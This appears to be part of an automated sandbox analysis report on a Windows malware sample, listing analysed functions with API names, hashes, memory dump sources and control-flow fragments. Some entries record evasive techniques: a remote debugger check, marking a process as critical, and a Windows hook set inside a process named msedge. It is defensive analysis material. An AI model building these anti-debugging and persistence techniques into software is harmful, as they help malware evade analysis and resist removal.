                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 15bdf73cda2f41086707368dd9349a273cb6e4dedd62d10c03f2e51642f891d7
                                                                                                                                                                                                      • Instruction ID: b078ee3949d9209accfb1fbc45f75cb88c56423734a6c7607804021d9e62df60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15bdf73cda2f41086707368dd9349a273cb6e4dedd62d10c03f2e51642f891d7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 271118AAB14B018AEB00CB78E8592A933A4FB59758F440E31DB6D867A4DF7CE5598340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                      • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                      • Instruction ID: d01e687f5c737a1716513eb621d5cf813aec06a6f1a0f07a87aa6a2680b5a6bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8412822A092C242FB24AB25A451BB9E650EB92FA4F944335EE7C07AD9DF3CD451C750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5990B6
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7FF58CC15), ref: 00007FF7FF5990D4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                      • API String ID: 3580290477-2366978088
                                                                                                                                                                                                      • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                      • Instruction ID: 116025176c9ba06b75a6b1c5997c503702ba13ee47ba7defce06554ddc0d27b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E417132A0879285EB28BF2594800FDA7A4FB457D0BD54235E97E43BC5DE3CE48283E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: 4350fd86aabc0073b0910ea94eab0ec3ec10ade74b9cb836cc04849bbc619faf
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: 8441A472B19BC685DB609F25E4443E9A760FB88794F845231EE6D87B98EF3CD401C790
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID: void$void
• API String ID: 2943138195-3746155364
• Opcode ID: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
• Instruction ID: f919ea962d514bd11df59845f09185aa487075293fc0c723f568f0edad2012d4
• Opcode Fuzzy Hash: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
• Instruction Fuzzy Hash: 793107FAF18B5599FB11CBB8D8480EC37B0BB48788B440136DB4E66B59EF389145C758
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
• Instruction ID: 9fc44e8121d8efa71f70279b571c035e06d98e4d0367eb3b9010fceeea1011ee
• Opcode Fuzzy Hash: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
• Instruction Fuzzy Hash: 1C21C362A082C182EB38AB15D0442ADB3F5FB84B84FD54235D6BD436D4DF7CD9558BA0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: FileHeader$ExceptionRaise
• String ID: Access violation - no RTTI data!$Bad dynamic_cast!
• API String ID: 3685223789-3176238549
• Opcode ID: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
• Instruction ID: 3b7c01dbdbed19f8ba1d7a96c5fb389fdd233a8b164e7eb0b056f7e6a01491bd
• Opcode Fuzzy Hash: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
• Instruction Fuzzy Hash: 000184E9B29A46D3EE40DB38E4595786360FF90B44F849032E74E07665EF6CE949C708
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction ID: 62b1d1f84e2720f0c2b144e6d6778a27936c91cc0b47464ab0b2b22f3f879139
• Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction Fuzzy Hash: 09115132609B8182EB609F15F400299B7E0FB88B84F584231DBAD077A9DF3CC561C740
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
• Instruction ID: 984ac1c2dd8fae40bf88ddda4c98963282121bb84d2f84b7ba3417aa59493804
• Opcode Fuzzy Hash: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
• Instruction Fuzzy Hash: A7114CB6709B8182EB21CB29E44425AB7E4FB88B94F584235DF8C07758EF3CC5518704
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
• Instruction ID: 51002d20dc399fcf7225d531e7aa008d07496236daae5ad4f3dea19c87a1a16d
• Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
• Instruction Fuzzy Hash: C01716291928386F734BF6094652BEA3A0EF44708FC40235D57D83BD1DE3CE514CAA4
APIs
  • Part of subcall function 00007FFBBCD4E720: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBBCD4E74B
  • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
• terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD4E50A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __except_validate_context_recordabortterminate
                                                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                                                      • API String ID: 339134311-629598281
                                                                                                                                                                                                      • Opcode ID: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
                                                                                                                                                                                                      • Instruction ID: 6d388b233bd59ddcd64ce30b0926c914ada1dbc725eccaeb0d4ac9d53106364c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51E0E5F9F0864291EB20FB74F28813CABA0AF05B50F148138DB4806A4BDE3CD9908309
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: memcpy$memmove
• String ID:
• API String ID: 1283327689-0
• Opcode ID: a822a3c8bf466068df5eb3aac5ce475471c643321ec8a211c878ee833f65bf0a
• Instruction ID: 0914c9fec8ca8443ca60d2a327d0ef8ba0deae937b4270149a23ea579dfe616b
• Opcode Fuzzy Hash: a822a3c8bf466068df5eb3aac5ce475471c643321ec8a211c878ee833f65bf0a
• Instruction Fuzzy Hash: D131E1B2B086448BDA149E3EE844168F7A2FB14B90B589139DB5F477E4DE7CDC41C704
APIs
• GetLastError.KERNEL32(?,?,?,00007FFBBCD453A9,?,?,?,?,00007FFBBCD4F63F,?,?,?,?,?), ref: 00007FFBBCD45543
• SetLastError.KERNEL32(?,?,?,00007FFBBCD453A9,?,?,?,?,00007FFBBCD4F63F,?,?,?,?,?), ref: 00007FFBBCD455CC
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
• Instruction ID: 08e8f78524a5ca4f1d0beda0204243ba4aa1b537f842445dc8f85fac0f92aaa8
• Opcode Fuzzy Hash: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
• Instruction Fuzzy Hash: F711F1F8B0974282FA55DB7DE85C23963A2AF447A1F544A34DB2D473D5EE3CE842C608

Execution Graph

Execution Coverage: 27.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 33.3%
Total number of Nodes: 9
Total number of Limit Nodes: 0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 971cfec5625fbeb0b02d5476e0101b682bf71d55649977abf9be5737cc48d148
• Instruction ID: 2a0bb152af3cefb52d11a105746113fd75a36d9e0dbbf35f21c2d1cf801f0309
• Opcode Fuzzy Hash: 971cfec5625fbeb0b02d5476e0101b682bf71d55649977abf9be5737cc48d148
• Instruction Fuzzy Hash: 2C51107190CB898FDB46EF78C8456A97FF0FF56311F0842ABD489C7192DB28A845CB91

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
Similarity
• API ID: CriticalProcess
• String ID: O_^
• API String ID: 2695349919-3627497092
• Opcode ID: ffffcf1a3d63b31aa9b899954f54bf52d4401e7e6b1913b6ed28fbf7f31412f9
• Instruction ID: eeb66dd2ba1241553f76db591bccfda0ed52526f30c1577cd0f7c15c36352829
• Opcode Fuzzy Hash: ffffcf1a3d63b31aa9b899954f54bf52d4401e7e6b1913b6ed28fbf7f31412f9
• Instruction Fuzzy Hash: 2A31007190CA498FDB29EF6CD845AE97BF0FF55311F14412EE09AD3682CB24A846CB91

Control-flow Graph

control_flow_graph 374 7ffb49899bad-7ffb49899c28 378 7ffb49899c2a-7ffb49899c2f 374->378 379 7ffb49899c32-7ffb49899c64 374->379 378->379 381 7ffb49899c66 379->381 382 7ffb49899c6c-7ffb49899c9f 379->382 381->382 384 7ffb49899caa-7ffb49899d1d 382->384 385 7ffb49899ca1-7ffb49899ca9 382->385 389 7ffb49899d23-7ffb49899d28 384->389 390 7ffb49899da9-7ffb49899dad 384->390 385->384 394 7ffb49899d2f-7ffb49899d30 389->394 391 7ffb49899d32-7ffb49899d6f SetWindowsHookExW 390->391 392 7ffb49899d77-7ffb49899da8 391->392 393 7ffb49899d71 391->393 393->392 394->391
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 25339889b09142d1d0843cca359bad7f04ed94ccf09037d3d4ba009e590a8318
• Instruction ID: 9cd9231d03d6522a929c792c2cfbe3d1856f50698f8e0b59b6bb6ece4d217a9a
• Opcode Fuzzy Hash: 25339889b09142d1d0843cca359bad7f04ed94ccf09037d3d4ba009e590a8318
• Instruction Fuzzy Hash: C771017090CA4D8FDB49EF6CD8466F9BBE1EF59321F00422ED049C3692CB65A8068B81

Control-flow Graph

control_flow_graph 420 7ffb498998a8-7ffb49899960 RtlSetProcessIsCritical 424 7ffb49899968-7ffb4989999d 420->424 425 7ffb49899962 420->425 425->424
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
• Opcode ID: 03bfcb85d824aeede859a38616d033c888a261a0e5070483ddb3834dd3791dcb
• Instruction ID: 555c06340940ef7e1a0f04b621e383e90d16b0d96d522f6513543fdc9e800a92
• Opcode Fuzzy Hash: 03bfcb85d824aeede859a38616d033c888a261a0e5070483ddb3834dd3791dcb
• Instruction Fuzzy Hash: 4231CF7190CA188FDB28DFACD845AE97BF0FF55311F14012EE49AD3682CB70A846CB81
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
Similarity
• API ID:
• String ID: HA{I$HA{I$HA{I$HA{I$HA{I$\
• API String ID: 0-361601824
• Opcode ID: 3dac6a43c64f0651738ae0d428a689a13dde00a575bfa98e8a0e684713910df7
• Instruction ID: db1d4ba9412d6b3be0cbe0707f5ff2b17862a75a91cbcbcad1ab15026b7fba6e
• Opcode Fuzzy Hash: 3dac6a43c64f0651738ae0d428a689a13dde00a575bfa98e8a0e684713910df7
• Instruction Fuzzy Hash: F24232B1A1CA4A4FE769EE3CC48167977D1EF89740F14427ED48FC7292CD28B84687A1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$@W{I$@W{I$@W{I$@W{I
                                                                                                                                                                                                      • API String ID: 0-1465678087
                                                                                                                                                                                                      • Opcode ID: a44ccb3a8ded7c5eeb74b64028d5d59c09daa02929ef4c24b6444f08b88f91a3
                                                                                                                                                                                                      • Instruction ID: d86aba8b24d82e51f5bb784f83e07c4d272a6476292133807651bee5ecbd15cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a44ccb3a8ded7c5eeb74b64028d5d59c09daa02929ef4c24b6444f08b88f91a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B02A0B1A1CB4A8FE758EF2CC445669B7E2FFA9340F10457EE489C7292DE34E8458742
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$@W{I$@W{I$@W{I$@W{I
                                                                                                                                                                                                      • API String ID: 0-1465678087
                                                                                                                                                                                                      • Opcode ID: 87672e0f6c9502d3e286bb10bfbfef04a177173d0db8dc74e154fdee82cfd3d3
                                                                                                                                                                                                      • Instruction ID: a17802007ed0f3de4a40def051787547666dbc564693c2779378cc4dd87f020a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87672e0f6c9502d3e286bb10bfbfef04a177173d0db8dc74e154fdee82cfd3d3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 030290B1A1CB4A8FE758EF2CC445669B7D2FFA9340F10457EE48AC7292DE34E8458742
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$@W{I$@W{I$@W{I$@W{I
                                                                                                                                                                                                      • API String ID: 0-1465678087
                                                                                                                                                                                                      • Opcode ID: 08230e405fc524257b7f299715d6b3f2adbfd2965a95d41f01ec945526cce745
                                                                                                                                                                                                      • Instruction ID: f4807be016af7751f979efc7831f205d369feda9f62201abbb0fbc170c33315e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08230e405fc524257b7f299715d6b3f2adbfd2965a95d41f01ec945526cce745
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7391C4B295CA879FE759EE2CC445765B7E1FFA8380F0405B9D04AC75C2DE34E8868782
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: ?K_H$HA{I$HA{I
                                                                                                                                                                                                      • API String ID: 0-2354627073
                                                                                                                                                                                                      • Opcode ID: 7587dcfcc640ca41cdeae98f3a0a5608c0ad06dd8af928e81470b4b7bab58214
                                                                                                                                                                                                      • Instruction ID: 569d8fa7bfaebcddcfca36dee77d9b090029a46de9b58704ebf469c95ef66591
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7587dcfcc640ca41cdeae98f3a0a5608c0ad06dd8af928e81470b4b7bab58214
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53B1E3A0A0CA4B4FE769BE3CC5982B577A1EF46790F0542BED45EC71C3ED2868458361
